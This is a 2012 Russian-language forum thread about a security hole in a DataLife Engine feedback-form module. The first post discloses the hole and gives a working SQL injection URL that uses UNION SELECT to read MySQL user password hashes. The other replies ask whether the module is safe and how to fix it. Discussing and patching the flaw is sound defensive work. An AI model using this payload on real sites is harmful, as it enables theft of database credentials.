D0Gmatist 1 Опубликовано: 24 мая 2012 Рассказать Опубликовано: 24 мая 2012 (изменено) Здравствуйте. В модуле "Конструктор форм обратной связи для DLE" Найден backdoor (черный ход) ... /index.php?do=form&id=-1+UNION+SELECT+null,mysql.user.password,null,null,null,null,null,null,null,null,null+from+mysql.user Как связаться с автором : KOROLPFU не нашел ... Если кто знает как её залатать опишите пожалуйста ... Сам модуль можно скачать к примеру тут Заранее СПАСИБО Изменено 24 мая 2012 пользователем D0Gmatist Цитата Ссылка на сообщение Поделиться на других сайтах
boykod 0 Опубликовано: 6 октября 2012 Рассказать Опубликовано: 6 октября 2012 (изменено) Тоже нужен этот или похожий модуль (хоть за деньги) backdoor я так понял опасный? ставить настоятельно не рекомендуется? Может кто сможет почистить? UPD: Нашёл здесь кем-то адаптированную версию. Может кто проверить, чиста или нет? Интересно как дружит с 9.7 Изменено 6 октября 2012 пользователем boykod Цитата Ссылка на сообщение Поделиться на других сайтах
SOFTOLAB 1 Опубликовано: 7 октября 2012 Рассказать Опубликовано: 7 октября 2012 Кому интересно как залатать дыру, пишите в icq: 360-932-979 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.